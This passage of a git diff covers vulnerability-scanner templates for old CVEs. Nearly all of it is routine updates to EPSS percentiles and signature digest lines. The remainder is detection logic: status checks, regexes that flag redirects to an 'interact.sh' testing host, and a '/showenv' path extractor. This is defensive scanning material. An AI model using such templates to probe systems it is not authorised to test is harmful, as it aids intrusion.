4b0a00483046022100d5e7808e54773df6ee8c886381b4c6e9067af8cae1c578c7c66e43d7d77aba4402210093368df9de3ff83dc3f6e531235c1c8614c68a32f987ebe858867646fe822c18:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100d5e7808e54773df6ee8c886381b4c6e9067af8cae1c578c7c66e43d7d77aba4402210093368df9de3ff83dc3f6e531235c1c8614c68a32f987ebe858867646fe822c18:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2011/CVE-2011-5181.yaml b/http/cves/2011/CVE-2011-5181.yaml index 37c399077b..448157ee9a 100644 --- a/http/cves/2011/CVE-2011-5181.yaml +++ b/http/cves/2011/CVE-2011-5181.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2011-5181 cwe-id: CWE-79 epss-score: 0.0023 - epss-percentile: 0.61025 + epss-percentile: 0.61042 cpe: cpe:2.3:a:clickdesk:clickdesk_live_support-live_chat_plugin:2.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200458419bae88171ff140661a4d7ee8dfa0328109bd641a1065ca63085c7f7e2d022100cb411156db11eaa736d25cf284761f918cba2667d24ec436e528b47f2ede23f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502200458419bae88171ff140661a4d7ee8dfa0328109bd641a1065ca63085c7f7e2d022100cb411156db11eaa736d25cf284761f918cba2667d24ec436e528b47f2ede23f8:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2011/CVE-2011-5252.yaml b/http/cves/2011/CVE-2011-5252.yaml index 908668a189..531b1cb882 100644 --- a/http/cves/2011/CVE-2011-5252.yaml +++ b/http/cves/2011/CVE-2011-5252.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2011-5252 cwe-id: CWE-20 epss-score: 0.02747 - epss-percentile: 0.89429 + epss-percentile: 0.89437 cpe: cpe:2.3:a:orchardproject:orchard:1.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -38,4 +38,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 490a0046304402200c3c0f08867ef8c62bf48e43575771466171eb241fdc429910a01600bfe22e710220733f2eeac65e7db322355217dd90314d0a8198347e3e7bcecd3f9be908b67d09:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402200c3c0f08867ef8c62bf48e43575771466171eb241fdc429910a01600bfe22e710220733f2eeac65e7db322355217dd90314d0a8198347e3e7bcecd3f9be908b67d09:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2011/CVE-2011-5265.yaml b/http/cves/2011/CVE-2011-5265.yaml index 1ddc29df3b..6e29bf84b8 100644 --- a/http/cves/2011/CVE-2011-5265.yaml +++ b/http/cves/2011/CVE-2011-5265.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2011-5265 cwe-id: CWE-79 epss-score: 0.00305 - epss-percentile: 0.6642 + epss-percentile: 0.66435 cpe: cpe:2.3:a:featurific_for_wordpress_project:featurific-for-wordpress:1.6.2:*:*:*:*:*:*:* metadata: max-request: 1 @@ -45,4 +45,5 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210099062116d3d1dcc944d2e7817fa5a514e1db3fee02a95d053f3457b3019bffd102210090805df21c74b6d0729da6b69351e9efcbafa03250440492bbce1462f6ce790a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a0048304602210099062116d3d1dcc944d2e7817fa5a514e1db3fee02a95d053f3457b3019bffd102210090805df21c74b6d0729da6b69351e9efcbafa03250440492bbce1462f6ce790a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-0392.yaml b/http/cves/2012/CVE-2012-0392.yaml index 196c237ac6..4b8e1e1d66 100644 --- a/http/cves/2012/CVE-2012-0392.yaml +++ b/http/cves/2012/CVE-2012-0392.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2012-0392 cwe-id: NVD-CWE-noinfo epss-score: 0.97059 - epss-percentile: 0.9968 + epss-percentile: 0.99681 cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100954c78a39cfea0856f23e21b8ea8c92b82e57d7f6b507a162ff65f76c50e2fdf02202d18f779eca83311c7b5e7a625e210b21dc907fd784d6f4d96b215a79739de15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100954c78a39cfea0856f23e21b8ea8c92b82e57d7f6b507a162ff65f76c50e2fdf02202d18f779eca83311c7b5e7a625e210b21dc907fd784d6f4d96b215a79739de15:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-0394.yaml b/http/cves/2012/CVE-2012-0394.yaml index 4b665bec9f..d3f7cadb33 100644 --- a/http/cves/2012/CVE-2012-0394.yaml +++ b/http/cves/2012/CVE-2012-0394.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2012-0394 cwe-id: CWE-94 epss-score: 0.95611 - epss-percentile: 0.99203 + epss-percentile: 0.99204 cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* metadata: verified: true @@ -48,4 +48,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ece3b67a3e42744e02eeee1b0081aa52096b8fc3557c4ba8e65f3c66465163340220284be9351dec593c3927c2bcd0bad5b14a2c7a7abf2b4b768776d2132dc3cc76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100ece3b67a3e42744e02eeee1b0081aa52096b8fc3557c4ba8e65f3c66465163340220284be9351dec593c3927c2bcd0bad5b14a2c7a7abf2b4b768776d2132dc3cc76:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-0896.yaml b/http/cves/2012/CVE-2012-0896.yaml index 032220a907..373cfeda96 100644 --- a/http/cves/2012/CVE-2012-0896.yaml +++ b/http/cves/2012/CVE-2012-0896.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2012-0896 cwe-id: CWE-22 epss-score: 0.02262 - epss-percentile: 0.88401 + epss-percentile: 0.8841 cpe: cpe:2.3:a:count_per_day_project:count_per_day:2.2:*:*:*:*:*:*:* metadata: max-request: 1 @@ -42,4 +42,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402204380015f47601d552da361c481627432a5fe21446ee7733ac81be729a829f25a022008e7c4f9a4d268d5daf8d5ef485444510148d9da8717010571ad060a6e964156:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402204380015f47601d552da361c481627432a5fe21446ee7733ac81be729a829f25a022008e7c4f9a4d268d5daf8d5ef485444510148d9da8717010571ad060a6e964156:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-0901.yaml b/http/cves/2012/CVE-2012-0901.yaml index 8078e98535..b92739485a 100644 --- a/http/cves/2012/CVE-2012-0901.yaml +++ b/http/cves/2012/CVE-2012-0901.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2012-0901 cwe-id: CWE-79 epss-score: 0.00216 - epss-percentile: 0.59446 + epss-percentile: 0.59467 cpe: cpe:2.3:a:attenzione:yousaytoo:1.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c3f97673614235f67d8e93e83246375d10c18470e1d68bd3143c2847b135b3cd02210088502ead26f9158c39fa436b9314122141c7bdbf7c5d6f5d157ce2fcd6c2a6b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100c3f97673614235f67d8e93e83246375d10c18470e1d68bd3143c2847b135b3cd02210088502ead26f9158c39fa436b9314122141c7bdbf7c5d6f5d157ce2fcd6c2a6b2:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-0981.yaml b/http/cves/2012/CVE-2012-0981.yaml index 08b4faf6ff..62d89735eb 100644 --- a/http/cves/2012/CVE-2012-0981.yaml +++ b/http/cves/2012/CVE-2012-0981.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2012-0981 cwe-id: CWE-22 epss-score: 0.02053 - epss-percentile: 0.8778 + epss-percentile: 0.87789 cpe: cpe:2.3:a:kybernetika:phpshowtime:2.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 490a004630440220239c91283d8a692dab3f44b8d3a611f6b05c871ed580bae7344aa9e4672534910220536261527823e46f954c779b28d249f293b614d8101c49bb5483b77a3621a924:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220239c91283d8a692dab3f44b8d3a611f6b05c871ed580bae7344aa9e4672534910220536261527823e46f954c779b28d249f293b614d8101c49bb5483b77a3621a924:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-0991.yaml b/http/cves/2012/CVE-2012-0991.yaml index ec3a2f56d0..555d8b5eda 100644 --- a/http/cves/2012/CVE-2012-0991.yaml +++ b/http/cves/2012/CVE-2012-0991.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2012-0991 cwe-id: CWE-22 epss-score: 0.8848 - epss-percentile: 0.98352 + epss-percentile: 0.98356 cpe: cpe:2.3:a:openemr:openemr:4.1.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201ca15a560a4b79dddf9b25d765fa94198d5acfde5a4a1fcbc9f2dd50c21a909c022100c25c5e39aa4788dbfbc900e504d971411a4b30a5c57fbb7aabe69828162184c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502201ca15a560a4b79dddf9b25d765fa94198d5acfde5a4a1fcbc9f2dd50c21a909c022100c25c5e39aa4788dbfbc900e504d971411a4b30a5c57fbb7aabe69828162184c1:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-0996.yaml b/http/cves/2012/CVE-2012-0996.yaml index 3eadc1da40..aa8c2b9ee8 100644 --- a/http/cves/2012/CVE-2012-0996.yaml +++ b/http/cves/2012/CVE-2012-0996.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2012-0996 cwe-id: CWE-22 epss-score: 0.01048 - epss-percentile: 0.82399 + epss-percentile: 0.82418 cpe: cpe:2.3:a:11in1:11in1:1.2.1:stable_12-31-2011:*:*:*:*:*:* metadata: max-request: 1 @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022023990aaa0a337943929270d73a6ca6ccfa0951e71e4d35affffe47368a01ee2d02203c2852f34881275b33bc47af71ff141cb8592e1dc166c19cd15c60b18ec93ac8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022023990aaa0a337943929270d73a6ca6ccfa0951e71e4d35affffe47368a01ee2d02203c2852f34881275b33bc47af71ff141cb8592e1dc166c19cd15c60b18ec93ac8:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-1226.yaml b/http/cves/2012/CVE-2012-1226.yaml index 2fd23d97bf..4d18015ed9 100644 --- a/http/cves/2012/CVE-2012-1226.yaml +++ b/http/cves/2012/CVE-2012-1226.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2012-1226 cwe-id: CWE-22 epss-score: 0.10469 - epss-percentile: 0.94386 + epss-percentile: 0.94391 cpe: cpe:2.3:a:dolibarr:dolibarr_erp\/crm:3.2.0:alpha:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220684f7d73c2bce20bbdf1676a21975e746afc3de3c40661bf8b4d016bb490758b022100b3a3bc59986dc9da7604961ffdad0cc3bedec69b6848fcd44d1f7b1752a6570c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220684f7d73c2bce20bbdf1676a21975e746afc3de3c40661bf8b4d016bb490758b022100b3a3bc59986dc9da7604961ffdad0cc3bedec69b6848fcd44d1f7b1752a6570c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-1823.yaml b/http/cves/2012/CVE-2012-1823.yaml index d2dae4b902..22fbd55cf8 100644 --- a/http/cves/2012/CVE-2012-1823.yaml +++ b/http/cves/2012/CVE-2012-1823.yaml @@ -47,4 +47,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022077d4558fca2079cc981f49ee2501aaa9a9803e6b4236cb43a196ce83a986c972022100f0969c456e63cd95ecf211a6bae8b3f436bb423e38e360eac72c463e34fb9ad1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022077d4558fca2079cc981f49ee2501aaa9a9803e6b4236cb43a196ce83a986c972022100f0969c456e63cd95ecf211a6bae8b3f436bb423e38e360eac72c463e34fb9ad1:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-1835.yaml b/http/cves/2012/CVE-2012-1835.yaml index c1aceb98b9..226f3bf87d 100644 --- a/http/cves/2012/CVE-2012-1835.yaml +++ b/http/cves/2012/CVE-2012-1835.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2012-1835 cwe-id: CWE-79 epss-score: 0.00229 - epss-percentile: 0.60966 + epss-percentile: 0.60983 cpe: cpe:2.3:a:timely:all-in-one_event_calendar:1.4:*:*:*:*:*:*:* metadata: max-request: 1 @@ -51,4 +51,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210094a6c30380185b870410a6ff1df27c7d96caac3b30fa740671b610d86195b5d0022002f30d7b66357e85319c250030189ccde944c0f3a804b2f338446b400c53ac7c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502210094a6c30380185b870410a6ff1df27c7d96caac3b30fa740671b610d86195b5d0022002f30d7b66357e85319c250030189ccde944c0f3a804b2f338446b400c53ac7c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-2371.yaml b/http/cves/2012/CVE-2012-2371.yaml index 14ae08c7c3..18503dc159 100644 --- a/http/cves/2012/CVE-2012-2371.yaml +++ b/http/cves/2012/CVE-2012-2371.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2012-2371 cwe-id: CWE-79 epss-score: 0.00605 - epss-percentile: 0.76227 + epss-percentile: 0.7624 cpe: cpe:2.3:a:mnt-tech:wp-facethumb:0.1:*:*:*:*:*:*:* metadata: max-request: 1 @@ -47,4 +47,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203dd116a8c62231233956a8031d085958ff0c79e51e5ab8d77d2d199597543568022100bce1ac49f3cf76c4b8ae0626be2bccf99be676aabdc8d44ee0d13e5815c21c7a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502203dd116a8c62231233956a8031d085958ff0c79e51e5ab8d77d2d199597543568022100bce1ac49f3cf76c4b8ae0626be2bccf99be676aabdc8d44ee0d13e5815c21c7a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-3153.yaml b/http/cves/2012/CVE-2012-3153.yaml index faf22db611..1c24c0ea4c 100644 --- a/http/cves/2012/CVE-2012-3153.yaml +++ b/http/cves/2012/CVE-2012-3153.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2012-3153 cwe-id: NVD-CWE-noinfo epss-score: 0.97048 - epss-percentile: 0.99672 + epss-percentile: 0.99674 cpe: cpe:2.3:a:oracle:fusion_middleware:11.1.1.4.0:*:*:*:*:*:*:* metadata: max-request: 2 @@ -64,4 +64,5 @@ http: name: linux_working_path regex: - "/.*/showenv" -# digest: 4a0a00473045022100f680bf3cd8d638a7b0896b9b50a1409c06975f27925611d1e406df5e3659f991022018e6f389af7564f987cee0df9f1e355eaaa6281b16e3ba8d5b5989d8dada5ef4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100f680bf3cd8d638a7b0896b9b50a1409c06975f27925611d1e406df5e3659f991022018e6f389af7564f987cee0df9f1e355eaaa6281b16e3ba8d5b5989d8dada5ef4:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-4032.yaml b/http/cves/2012/CVE-2012-4032.yaml index 5cfeae589c..76f127eb01 100644 --- a/http/cves/2012/CVE-2012-4032.yaml +++ b/http/cves/2012/CVE-2012-4032.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2012-4032 cwe-id: CWE-20 epss-score: 0.00951 - epss-percentile: 0.8149 + epss-percentile: 0.815 cpe: cpe:2.3:a:websitepanel:websitepanel:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -45,4 +45,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:http?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' -# digest: 4b0a00483046022100a905ddc5035a69419eb9637464e5afe558bc530f4e7da59b53498a6479d182a6022100e654af5e628f673dd10bb1fc5e04eccf08d985335bc57072c15b6d1c9f9e37b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100a905ddc5035a69419eb9637464e5afe558bc530f4e7da59b53498a6479d182a6022100e654af5e628f673dd10bb1fc5e04eccf08d985335bc57072c15b6d1c9f9e37b3:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-4242.yaml b/http/cves/2012/CVE-2012-4242.yaml index a86f98ddab..07d70438e5 100644 --- a/http/cves/2012/CVE-2012-4242.yaml +++ b/http/cves/2012/CVE-2012-4242.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2012-4242 cwe-id: CWE-79 epss-score: 0.00216 - epss-percentile: 0.59462 + epss-percentile: 0.59483 cpe: cpe:2.3:a:mf_gig_calendar_project:mf_gig_calendar:0.9.2:*:*:*:*:*:*:* metadata: max-request: 1 @@ -44,4 +44,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200f78275f8b85e38ae15737ef6741e842981461ca16aa037e10ffcaa0bfa345d4022100ec8dd23b9463ec96e17c2b334f73304f4195c6517c8bdf78774bbd0f32db7a94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502200f78275f8b85e38ae15737ef6741e842981461ca16aa037e10ffcaa0bfa345d4022100ec8dd23b9463ec96e17c2b334f73304f4195c6517c8bdf78774bbd0f32db7a94:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-4253.yaml b/http/cves/2012/CVE-2012-4253.yaml index 1c1c736998..7a80e09f7f 100644 --- a/http/cves/2012/CVE-2012-4253.yaml +++ b/http/cves/2012/CVE-2012-4253.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2012-4253 cwe-id: CWE-22 epss-score: 0.02906 - epss-percentile: 0.89678 + epss-percentile: 0.89687 cpe: cpe:2.3:a:mysqldumper:mysqldumper:1.24.4:*:*:*:*:*:*:* metadata: max-request: 1 @@ -41,4 +41,5 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210082a8bcd368b0f5e5dd222eb306bd816b53964a00a16011d48e9fabf354d6a9f7022100d6a90837ad93a392515461b287be5c65826ca272591d0f0f731d66cac13201bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a0048304602210082a8bcd368b0f5e5dd222eb306bd816b53964a00a16011d48e9fabf354d6a9f7022100d6a90837ad93a392515461b287be5c65826ca272591d0f0f731d66cac13201bb:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-4273.yaml b/http/cves/2012/CVE-2012-4273.yaml index c0bf55c3d9..fe8adf1f37 100644 --- a/http/cves/2012/CVE-2012-4273.yaml +++ b/http/cves/2012/CVE-2012-4273.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2012-4273 cwe-id: CWE-79 epss-score: 0.00252 - epss-percentile: 0.62941 + epss-percentile: 0.62959 cpe: cpe:2.3:a:ppfeufer:2-click-social-media-buttons:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -48,4 +48,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402205e3cfb8b9635fa56449d88fe0702b4905077722055cf3571122970a172430d4202206de82c90e78d17fbea8b977cdefb1dd21045277fe3a8f297357b938deec9dbc4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402205e3cfb8b9635fa56449d88fe0702b4905077722055cf3571122970a172430d4202206de82c90e78d17fbea8b977cdefb1dd21045277fe3a8f297357b938deec9dbc4:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-4547.yaml b/http/cves/2012/CVE-2012-4547.yaml index 70b307dff3..abd32e9bce 100644 --- a/http/cves/2012/CVE-2012-4547.yaml +++ b/http/cves/2012/CVE-2012-4547.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2012-4547 cwe-id: CWE-79 epss-score: 0.0023 - epss-percentile: 0.61083 + epss-percentile: 0.61101 cpe: cpe:2.3:a:laurent_destailleur:awstats:*:*:*:*:*:*:*:* metadata: max-request: 2 @@ -48,4 +48,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100fd3b48ba8406a45ee0db3a03fc93331515e4d37ada4a47516d91c8a31fb3e51c022100b322b8568f04e6b38f68f7b8a69fedd67764e4b1cca4ea2ec444fce76549ff63:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100fd3b48ba8406a45ee0db3a03fc93331515e4d37ada4a47516d91c8a31fb3e51c022100b322b8568f04e6b38f68f7b8a69fedd67764e4b1cca4ea2ec444fce76549ff63:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-4768.yaml b/http/cves/2012/CVE-2012-4768.yaml index d03773aefb..a62773d0b8 100644 --- a/http/cves/2012/CVE-2012-4768.yaml +++ b/http/cves/2012/CVE-2012-4768.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2012-4768 cwe-id: CWE-79 epss-score: 0.00922 - epss-percentile: 0.81197 + epss-percentile: 0.81208 cpe: cpe:2.3:a:mikejolley:download_monitor:3.3.5.7:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -47,4 +47,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402205a2e6fff1fe3e4a156f49ae1b09fe0d484c9c607a5bcb38527b632304b57b82b0220577322896c64d1be84e063c1d227815f381aaaf5b6ee2255bc1cd376be1dbd7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402205a2e6fff1fe3e4a156f49ae1b09fe0d484c9c607a5bcb38527b632304b57b82b0220577322896c64d1be84e063c1d227815f381aaaf5b6ee2255bc1cd376be1dbd7f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-4878.yaml b/http/cves/2012/CVE-2012-4878.yaml index a414c08497..2d6f6cbd53 100644 --- a/http/cves/2012/CVE-2012-4878.yaml +++ b/http/cves/2012/CVE-2012-4878.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2012-4878 cwe-id: CWE-22 epss-score: 0.00954 - epss-percentile: 0.81544 + epss-percentile: 0.81555 cpe: cpe:2.3:a:flatnux:flatnux:2011-08-09-2:*:*:*:*:*:*:* metadata: max-request: 1 @@ -41,4 +41,5 @@ http: - type: status status: - 200 -# digest: 490a004630440220016c5f09c85244c642c56ab330f0ae46aeb247fd381b87ceafbf95ecd01940730220287cf609ee4854b4ca44f7b195c547b486c85496caf8d2db4e6c844273d64cb0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220016c5f09c85244c642c56ab330f0ae46aeb247fd381b87ceafbf95ecd01940730220287cf609ee4854b4ca44f7b195c547b486c85496caf8d2db4e6c844273d64cb0:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-4889.yaml b/http/cves/2012/CVE-2012-4889.yaml index 2850ddef77..d96242ee18 100644 --- a/http/cves/2012/CVE-2012-4889.yaml +++ b/http/cves/2012/CVE-2012-4889.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2012-4889 cwe-id: CWE-79 epss-score: 0.03526 - epss-percentile: 0.90509 + epss-percentile: 0.90515 cpe: cpe:2.3:a:manageengine:firewall_analyzer:7.2:*:*:*:*:*:*:* metadata: max-request: 1 @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d7df6f4d1b99e0affd32fb2a2e921b55855792cb4de580db3cbc397975642d69022100b4bbd6a13adc0d9a7674fb92e3f0cfff5d85815d657d290be09c2bbdcbe3b553:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100d7df6f4d1b99e0affd32fb2a2e921b55855792cb4de580db3cbc397975642d69022100b4bbd6a13adc0d9a7674fb92e3f0cfff5d85815d657d290be09c2bbdcbe3b553:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-4940.yaml b/http/cves/2012/CVE-2012-4940.yaml index 516da8730f..6f8c289dd7 100644 --- a/http/cves/2012/CVE-2012-4940.yaml +++ b/http/cves/2012/CVE-2012-4940.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2012-4940 cwe-id: CWE-22 epss-score: 0.04527 - epss-percentile: 0.91559 + epss-percentile: 0.91565 cpe: cpe:2.3:a:gecad:axigen_free_mail_server:-:*:*:*:*:*:*:* metadata: max-request: 2 @@ -40,4 +40,5 @@ http: - "fonts" - "extensions" condition: and -# digest: 4a0a004730450221009dc70261dc1adb65dc53a0bceed2c721166b75834adb8d0bc0e3e7f21c3bc40802201787b378d873475c6e932bab8a23799b8211a311452dbb62a9b407f42bf8fc9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450221009dc70261dc1adb65dc53a0bceed2c721166b75834adb8d0bc0e3e7f21c3bc40802201787b378d873475c6e932bab8a23799b8211a311452dbb62a9b407f42bf8fc9b:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-4982.yaml b/http/cves/2012/CVE-2012-4982.yaml index 0e6d6fc036..04e1dd62f1 100644 --- a/http/cves/2012/CVE-2012-4982.yaml +++ b/http/cves/2012/CVE-2012-4982.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2012-4982 cwe-id: CWE-20 epss-score: 0.00763 - epss-percentile: 0.79159 + epss-percentile: 0.79169 cpe: cpe:2.3:a:forescout:counteract:6.3.4.10:*:*:*:*:*:*:* metadata: max-request: 1 @@ -37,4 +37,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4a0a0047304502203d2cde83abaa7b672f836deb6296b80ca512a595066233807203e07b5a408500022100922f0880ec0d75365f0dcd45208f7909668b11dd013aa69c498c437eddf93277:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502203d2cde83abaa7b672f836deb6296b80ca512a595066233807203e07b5a408500022100922f0880ec0d75365f0dcd45208f7909668b11dd013aa69c498c437eddf93277:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-5321.yaml b/http/cves/2012/CVE-2012-5321.yaml index c69bdbf104..98d09efc1d 100644 --- a/http/cves/2012/CVE-2012-5321.yaml +++ b/http/cves/2012/CVE-2012-5321.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2012-5321 cwe-id: CWE-20 epss-score: 0.02432 - epss-percentile: 0.88791 + epss-percentile: 0.888 cpe: cpe:2.3:a:tiki:tikiwiki_cms\/groupware:8.3:*:*:*:*:*:*:* metadata: max-request: 1 @@ -38,4 +38,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' -# digest: 4a0a00473045022100a2af29b0d3773ce19f358f7c56bbada3657144362409fc68763eabbf98b116f1022071da3d5c777a0ea1591b8ef7b16ed1cfa16547a6fd8946ef32b78d3a6f04c8ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100a2af29b0d3773ce19f358f7c56bbada3657144362409fc68763eabbf98b116f1022071da3d5c777a0ea1591b8ef7b16ed1cfa16547a6fd8946ef32b78d3a6f04c8ee:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-5913.yaml b/http/cves/2012/CVE-2012-5913.yaml index db081172f1..f1e2dd26d5 100644 --- a/http/cves/2012/CVE-2012-5913.yaml +++ b/http/cves/2012/CVE-2012-5913.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2012-5913 cwe-id: CWE-79 epss-score: 0.00828 - epss-percentile: 0.80088 + epss-percentile: 0.80095 cpe: cpe:2.3:a:wordpress_integrator_project:wordpress_integrator:1.32:*:*:*:*:*:*:* metadata: max-request: 1 @@ -47,4 +47,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402202f5dc42ce4e24c78a86c23637cf0a6fa51b7ae705315d7ced8996f220d353ddc0220208cae56dda812f02e79d5027c3c08c91699c9a38442fc9ea244d4b81d4562bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402202f5dc42ce4e24c78a86c23637cf0a6fa51b7ae705315d7ced8996f220d353ddc0220208cae56dda812f02e79d5027c3c08c91699c9a38442fc9ea244d4b81d4562bb:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-6499.yaml b/http/cves/2012/CVE-2012-6499.yaml index c285b600e9..4fed986f28 